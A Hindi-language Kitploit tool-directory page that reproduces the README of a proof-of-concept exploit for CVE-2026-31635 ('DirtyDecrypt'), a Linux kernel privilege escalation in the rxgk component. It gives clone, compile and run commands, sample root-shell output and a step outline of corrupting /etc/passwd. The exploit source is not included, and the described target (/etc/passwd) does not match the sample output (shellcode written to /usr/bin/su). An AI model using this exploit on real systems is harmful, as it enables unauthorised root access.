Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31635 — CVE-2026-31635 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-31635
विशेषाधिकार वृद्धिशोषणCTFलर्निंग और शिक्षाबाइनरी शोषण
GitHub0xblackash/cve-2026-31635

CVE-2026-31635

CVE-2026-31635

रिपॉजिटरी देखें
523 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🩸 CVE-2026-31635 – DirtyDecrypt

ChatGPT Image May 19, 2026, 10_51_03 PM

लिनक्स कर्नेल स्थानीय विशेषाधिकार वृद्धि (Local Privilege Escalation) RXGK पेज कैश भ्रष्टाचार के माध्यम से

Version Severity Exploit

"DirtyDecrypt" — 2026 "Dirty" परिवार एक्सप्लॉइट्स का भाग


📖 अवलोकन (Overview)

DirtyDecrypt (CVE-2026-31635) लिनक्स कर्नेल के rxrpc उप-प्रणाली (विशेषकर rxgk घटक) में एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) कमजोरी है।

यह AES-CBC डिक्रिप्शन के दौरान कॉपी-ऑन-राइट (Copy-on-Write / COW) जांच की कमी का दुरुपयोग करता है, जिससे एक अविशेषाधिकार प्राप्त उपयोगकर्ता पेज कैश को भ्रष्ट कर सकता है और मनमानी फ़ाइल लेखन (arbitrary file writes) प्राप्त कर सकता है, जिससे रूट पहुँच मिलती है।


✨ विशेषताएँ (Features)

  • ✅ स्वच्छ और अच्छी तरह से टिप्पणी किया गया C कोड
  • ✅ उपयोगकर्ता + नेटवर्क नेमस्पेस समर्थन
  • ✅ विश्वसनीय पेज कैश राइट प्रिमिटिव
  • ✅ /etc/passwd को लक्षित करता है (खाली रूट पासवर्ड)
  • ✅ SUID बाइनरी या अन्य लक्ष्यों के लिए आसानी से संशोधित किया जा सकता है
  • ✅ स्थैतिक संकलन समर्थन

🛠️ प्रभावित तंत्र (Affected Systems)

  • कमजोर कर्नेल: 6.10 ~ 6.13 (CONFIG_RXGK=y के साथ)
  • सामान्य डिस्ट्रोस: Fedora, Arch Linux, openSUSE Tumbleweed, कस्टम कर्नेल
  • कमजोर नहीं: ~6.10 से पहले के कर्नेल या जिनमें CONFIG_RXGK=n है

📋 आवश्यकताएँ (Requirements)

  • CONFIG_RXGK सक्षम लिनक्स कर्नेल
  • अविशेषाधिकार प्राप्त स्थानीय उपयोगकर्ता पहुँच
  • AF_RXRPC सॉकेट समर्थन
  • keyctl उपयोगिता (rxrpc कुंजियों के लिए)

🚀 संकलन (Compilation)

root@kitploit:~
git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt

💥 उपयोग (Usage)

root@kitploit:~
sudo ./DirtyDecrypt

अपेक्षित सफल आउटपुट:

root@kitploit:~
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000

[*] /usr/bin/su पर शेलकोड लिखा जा रहा है (ऑफसेट 0 से 96 बाइट्स)
    [========================================] 100% (XXX/96, YYYY फायर)
[*] XXX फायर Z.Zs में
[*] /usr/bin/su निष्पादित किया जा रहा है
[*] पुनर्स्थापित करें: cp /tmp/.su_12345 /usr/bin/su

# whoami
root

# id
uid=0(root) gid=0(root) groups=0(root)

# 

📁 रिपॉजिटरी संरचना (Repository Structure)

root@kitploit:~
DirtyDecrypt/
├── CVE-2026-31635.c          # मुख्य एक्सप्लॉइट
├── README.md                 # यह फ़ाइल
├── Makefile                  # वैकल्पिक
└── exploit.log               # वैकल्पिक आउटपुट लॉग

🔬 यह कैसे काम करता है (तकनीकी)

  1. उपयोगकर्ता + नेटवर्क नेमस्पेस में प्रवेश
  2. कीरिंग में RXGK कुंजी जोड़ता है
  3. AF_RXRPC सॉकेट + splice() का उपयोग करके पेज कैश पृष्ठों को RXGK डिक्रिप्शन पथ में मजबूर करता है
  4. skb_cow_data() के बिना इन-प्लेस AES-CBC डिक्रिप्शन ट्रिगर करता है
  5. स्लाइडिंग विंडो तकनीक का उपयोग करके लक्ष्य फ़ाइल (/etc/passwd) को बाइट दर बाइट भ्रष्ट करता है
  6. रूट पासवर्ड खाली करता है → रूट शेल उत्पन्न करता है

⚠️ अस्वीकरण (Disclaimer)

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
उन तंत्रों पर अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध है।


📜 श्रेय और लेखक (Credits & Author)

  • एक्सप्लॉइट लेखक: Ashraf Zaryouh "0xBlackash"
  • मूल खोज: सुरक्षा शोधकर्ता (2026)
  • PoC संस्करण: v2.1 (मई 2026)

⭐ यदि इसने आपकी सहायता की तो इस रिपो को स्टार करें!

शोध समुदाय के लिए ❤️ से बनाया गया

टूल डाउनलोड करें